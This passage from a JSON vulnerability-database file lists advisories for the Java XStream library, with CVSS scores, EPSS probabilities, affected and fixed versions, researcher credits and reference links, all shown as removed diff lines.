-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-11-09T05:02:25.690788Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-03-23T17:13:22Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-21351.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "http://x-stream.github.io/changes.html%231.4.16"
-          },
-          {
-            "title": "XStream Workaround",
-            "url": "https://x-stream.github.io/security.html%23workaround"
-          },
-          {
-            "title": "Nuclei Templates",
-            "url": "https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21351.yaml"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088332": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.16)"
-        ],
-        "created_at": "2021-03-23T12:55:55.330773Z",
-        "credits": [
-          "threedr3am"
-        ],
-        "cvss_base_score": 6.1,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 6.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T14:05:18.441839Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 9.8,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:16.132491Z",
-            "severity": "critical",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 8.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:48.665066Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 8.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:10.62708Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N/E:P",
-        "disclosed_at": "2021-03-23T12:43:32Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.85802",
-          "probability": "0.02891"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088332",
-        "initially_fixed_in_versions": [
-          "1.4.16"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:53:48.665066Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-03-23T17:13:22.228057Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-21347.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "http://x-stream.github.io/changes.html%231.4.16"
-          },
-          {
-            "title": "XStream Workaround",
-            "url": "https://x-stream.github.io/security.html%23workaround"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088333": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.16)"
-        ],
-        "created_at": "2021-03-23T13:00:34.694452Z",
-        "credits": [
-          "Liaogui Zhong"
-        ],
-        "cvss_base_score": 5.3,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 5.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:59:48.677017Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:16.126324Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 5.9,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:58.157857Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 5.9,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:10.785616Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N/E:P",
-        "disclosed_at": "2021-03-23T12:59:14Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.70911",
-          "probability": "0.00687"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088333",
-        "initially_fixed_in_versions": [
-          "1.4.16"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:53:58.157857Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-03-23T17:13:21.536021Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-21343.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "http://x-stream.github.io/changes.html%231.4.16"
-          },
-          {
-            "title": "XStream Workaround",
-            "url": "https://x-stream.github.io/security.html%23workaround"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088334": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.16)"
-        ],
-        "created_at": "2021-03-23T13:03:29.960798Z",
-        "credits": [
-          "wh1t3p1g"
-        ],
-        "cvss_base_score": 6.1,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 6.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:59:49.067301Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 9.8,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:18.016235Z",
-            "severity": "critical",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 8.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:55.845185Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 8.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:08.223471Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N/E:P",
-        "disclosed_at": "2021-03-23T13:02:09Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.87885",
-          "probability": "0.03973"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088334",
-        "initially_fixed_in_versions": [
-          "1.4.16"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:53:55.845185Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-03-23T17:13:22.50249Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-21346.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "http://x-stream.github.io/changes.html%231.4.16"
-          },
-          {
-            "title": "XStream Workaround",
-            "url": "https://x-stream.github.io/security.html%23workaround"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088335": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.16)"
-        ],
-        "created_at": "2021-03-23T13:05:10.38087Z",
-        "credits": [
-          "threedr3am"
-        ],
-        "cvss_base_score": 5.3,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 5.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:59:45.866493Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 9.8,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:14.631578Z",
-            "severity": "critical",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 8.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:48.939054Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 8.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:11.186635Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N/E:P",
-        "disclosed_at": "2021-03-23T13:03:44Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.91816",
-          "probability": "0.08244"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088335",
-        "initially_fixed_in_versions": [
-          "1.4.16"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:53:48.939054Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-03-23T17:13:22.887658Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-21350.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "http://x-stream.github.io/changes.html%231.4.16"
-          },
-          {
-            "title": "XStream Workaround",
-            "url": "https://x-stream.github.io/security.html%23workaround"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088336": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.16)"
-        ],
-        "created_at": "2021-03-23T13:06:43.43948Z",
-        "credits": [
-          "threedr3am"
-        ],
-        "cvss_base_score": 6.1,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 6.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:59:49.112948Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 8.6,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:14.574112Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 5.9,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:58.146634Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 5.9,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:08.625138Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N/E:P",
-        "disclosed_at": "2021-03-23T13:05:14Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.90185",
-          "probability": "0.05914"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088336",
-        "initially_fixed_in_versions": [
-          "1.4.16"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:53:58.146634Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-03-23T17:13:23.378762Z",
-        "references": [
-          {
-            "title": "GitHub Advisory",
-            "url": "https://github.com/x-stream/xstream/security/advisories/GHSA-f6hm-88x3-mfjv"
-          },
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-21349.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "http://x-stream.github.io/changes.html%231.4.16"
-          },
-          {
-            "title": "XStream Workaround",
-            "url": "https://x-stream.github.io/security.html%23workaround"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088337": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.16)"
-        ],
-        "created_at": "2021-03-23T13:07:54.751721Z",
-        "credits": [
-          "threedr3am"
-        ],
-        "cvss_base_score": 7.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:57:42.563902Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:16.067576Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 5.9,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:49.003385Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 5.9,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:50:41.128443Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P",
-        "disclosed_at": "2021-03-23T13:06:47Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.95721",
-          "probability": "0.23434"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088337",
-        "initially_fixed_in_versions": [
-          "1.4.16"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:53:49.003385Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-03-23T17:13:23.143282Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-21341.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "http://x-stream.github.io/changes.html%231.4.16"
-          },
-          {
-            "title": "XStream Workaround",
-            "url": "https://x-stream.github.io/security.html%23workaround"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088338": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.16)"
-        ],
-        "created_at": "2021-03-23T13:10:40.084443Z",
-        "credits": [
-          "Liaogui Zhong"
-        ],
-        "cvss_base_score": 5.3,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 5.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:59:49.121964Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 9.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:16.9125Z",
-            "severity": "critical",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.4,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:53.281918Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 7.4,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:10.727302Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N/E:P",
-        "disclosed_at": "2021-03-23T13:07:59Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.76538",
-          "probability": "0.01022"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088338",
-        "initially_fixed_in_versions": [
-          "1.4.16"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:53:53.281918Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-03-23T17:13:23.58779Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-21342.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "http://x-stream.github.io/changes.html%231.4.16"
-          },
-          {
-            "title": "XStream Workaround",
-            "url": "https://x-stream.github.io/security.html%23workaround"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1294540": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.17)"
-        ],
-        "created_at": "2021-05-19T09:30:26.97764Z",
-        "credits": [
-          "V3geB1rd"
-        ],
-        "cvss_base_score": 6.2,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 6.2,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:58:36.286767Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:H/A:H/E:P/RL:O"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 8.8,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:12.710147Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:48.472439Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 8.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:46.729752Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:H/A:H/E:P/RL:O",
-        "disclosed_at": "2021-05-18T18:36:27Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.99596",
-          "probability": "0.90769"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Nuclei Templates",
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1294540",
-        "initially_fixed_in_versions": [
-          "1.4.17"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-11-12T05:03:44.633487Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-05-19T15:48:11.124631Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/x-stream/xstream/commit/f0c4a8d861b68ffc3119cfbbbd632deee624e227"
-          },
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-29505.html"
-          },
-          {
-            "title": "Nuclei Templates",
-            "url": "https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-29505.yaml"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569176": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.18)"
-        ],
-        "created_at": "2021-08-24T07:39:00.056207Z",
-        "credits": [
-          "Ceclin and YXXX"
-        ],
-        "cvss_base_score": 8.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:57:20.202713Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:12.80788Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:46.665032Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 8.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:58.619132Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
-        "disclosed_at": "2021-08-24T07:35:41Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.67772",
-          "probability": "0.00573"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569176",
-        "initially_fixed_in_versions": [
-          "1.4.18"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:53:46.665032Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-08-24T15:09:22.884471Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-39153.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "https://x-stream.github.io/changes.html%231.4.18"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569177": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.18)"
-        ],
-        "created_at": "2021-08-24T07:44:55.759327Z",
-        "credits": [
-          "Ceclin and YXXX"
-        ],
-        "cvss_base_score": 8.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:57:20.273652Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:51:50.577496Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:46.448489Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 8.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:57.308411Z",
